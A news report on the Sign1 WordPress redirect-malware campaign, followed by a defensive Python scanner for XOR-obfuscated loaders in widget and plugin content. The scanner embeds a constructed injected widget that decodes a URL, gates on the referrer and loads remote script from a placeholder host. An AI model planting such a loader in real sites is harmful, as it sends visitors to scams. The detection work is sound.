A malware campaign tracked as Sign1 has infected more than 39,000 WordPress sites in the past six months, using malicious JavaScript injections to redirect visitors to scam sites.
The most recent variant, seen within the past two months, is estimated to have compromised at least 2,500 sites, according to a report Sucuri published earlier this week.
The attacks work by planting malicious JavaScript inside legitimate HTML widgets and plugins whose purpose is to let site owners add arbitrary JavaScript and other code, which gives the attackers a ready-made place to insert their scripts.
The injected JavaScript is XOR-encoded. Once decoded, it loads a JavaScript file from a remote server, which in turn redirects visitors to a traffic distribution system (TDS) operated by VexTrio when certain conditions are met.
The malware also uses time-based randomization to build the URL it fetches, changing it every 10 minutes to sidestep blocklists. The domains involved are typically registered only a few days before they are put to use.
Another notable feature of the code is that it checks where the visitor came from: it inspects the referrer for major sites such as Google, Facebook, Yahoo, or Instagram, and if the referrer does not match one of them, the malware does not run. In practice, that means a site owner who opens the site directly, or a scanner that sends no referrer, will not trigger the redirect.
Visitors who pass that check are then redirected to other scam sites by additional JavaScript retrieved from the same server.
The Sign1 campaign, first identified in the second half of 2023, has gone through several iterations, with the operators using as many as 15 different domains since July 31, 2023.
The sites are suspected to have been compromised through brute-force attacks, although the attackers could also be exploiting vulnerabilities in plugins and themes to gain access.
According to security researcher Ben Martin, many of the injections are found in WordPress custom HTML widgets that the attackers add to compromised sites. In many cases the attackers use the legitimate Simple Custom CSS and JS plugin to insert the malicious code.
Because no malicious code is written to files on the server, the injection can persist unnoticed for long periods, Sucuri said. For the same reason, a file-integrity scan alone will not find it; the widget and plugin content stored in the database has to be inspected as well.
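As an added illustration, not Sucuri's tooling and not a Sign1 signature, the script below shows how one might check the two storage locations named above, custom HTML widget content and Simple Custom CSS and JS snippets, for the traits the article describes: an XOR decode step, a referrer gate on major sites, a 10-minute time bucket in the fetched URL, and a dynamically created script element. It also brute-forces a one-byte XOR key over any long hex string it finds, which is the simplest form of the encoding the article mentions. The sample entries are constructed, the XOR key, the storage-location labels and the example.invalid URL are assumptions, and the regular expressions are generic heuristics rather than patterns taken from real injections.

```python
"""Heuristic scan of WordPress-stored content for XOR-obfuscated JavaScript loaders.

Added illustration, not Sucuri's tooling and not a Sign1 signature. It checks the two
storage locations the article names: custom HTML widgets (option 'widget_custom_html'
in wp_options) and snippets saved by the Simple Custom CSS and JS plugin (post type
'custom-css-js' in wp_posts). All samples below are constructed; the URL uses a reserved
example domain and is not an indicator of compromise.
"""
import re
import string

PRINTABLE = set(string.printable) - {"\x0b", "\x0c"}

# Traits the article attributes to the injection: an XOR decode step, a referrer gate,
# a time bucket that changes the fetched URL every 10 minutes (600000 ms), and a
# dynamically created <script> element. Generic patterns, not signatures from real samples.
INDICATORS = {
    "xor_operator": re.compile(r"\^\s*(0x[0-9a-fA-F]+|\d+|\w+\.charCodeAt\s*\([^)]*\))"),
    "from_char_code": re.compile(r"String\.fromCharCode"),
    "referrer_gate": re.compile(r"document\.referrer"),
    "ten_minute_bucket": re.compile(r"(Date\.now\(\)|getTime\(\))\s*/\s*(600000|6e5)"),
    "dynamic_script": re.compile(r"createElement\s*\(\s*['\"]script['\"]\s*\)"),
}

# A quoted run of hex long enough to hold a URL is a candidate for the XOR layer.
HEX_BLOB = re.compile(r"['\"]([0-9a-fA-F]{24,})['\"]")


def xor_hex(data: str, key: int) -> str:
    """Toy encoder: XOR each character with a one-byte key and hex-encode the result."""
    return "".join(f"{ord(c) ^ key:02x}" for c in data)


def try_decode_hex(blob: str):
    """Brute-force the one-byte XOR key over a hex blob.

    Returns (key, text) for the first key that yields printable text containing 'http',
    or None. A multi-byte key would need a longer search; this covers the simple case.
    """
    raw = bytes.fromhex(blob)
    for key in range(256):
        text = "".join(chr(b ^ key) for b in raw)
        if "http" in text and all(ch in PRINTABLE for ch in text):
            return key, text
    return None


def score(content: str) -> dict:
    """Match the indicator patterns and try to peel the XOR layer off any hex blobs."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(content)]
    decoded = [d for d in map(try_decode_hex, HEX_BLOB.findall(content)) if d is not None]
    # Three independent traits, or a recovered URL, is enough to flag for manual review.
    return {"indicators": hits, "decoded": decoded, "suspicious": len(hits) >= 3 or bool(decoded)}


def scan(entries):
    """entries: iterable of (location, content) pairs, e.g. pulled from wp_options/wp_posts."""
    findings = []
    for location, content in entries:
        result = score(content)
        if result["suspicious"]:
            findings.append({"location": location, **result})
    return findings


# Constructed samples. The loader URL is XOR-encoded with an assumed one-byte key so the
# decoder has a realistic blob to recover; 'example.invalid' is a reserved placeholder.
LOADER_URL = "https://example.invalid/loader.js?t="
KEY = 0x37
INJECTED_WIDGET = (
    "<p>Follow us on social media</p>\n"
    '<script>var s="' + xor_hex(LOADER_URL, KEY) + '",d="";'
    "for(var i=0;i<s.length;i+=2){d+=String.fromCharCode(parseInt(s.substr(i,2),16)^0x37);}"
    "if(/google|facebook|yahoo|instagram/i.test(document.referrer)){"
    "var e=document.createElement('script');e.src=d+Math.floor(Date.now()/600000);"
    "document.head.appendChild(e);}</script>"
)
BENIGN_SNIPPET = "jQuery(function($){$('.menu').on('click',function(){$(this).toggleClass('open');});});"
SAMPLE_ENTRIES = [
    ("wp_options:widget_custom_html[2]", INJECTED_WIDGET),
    ("wp_posts:custom-css-js#41", BENIGN_SNIPPET),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_ENTRIES):
        print(finding["location"], finding["indicators"])
        for key, url in finding["decoded"]:
            print(f"  XOR key 0x{key:02x} -> {url}")
```

The scoring threshold is deliberately loose: a legitimate snippet can contain one or two of these traits, but an XOR-decoded string, a referrer check and a time-bucketed script URL together in one widget is worth a human look. On a real site the entries would come from the serialized `widget_custom_html` option and the plugin's `custom-css-js` posts, which is exactly the content a file-integrity scan never sees.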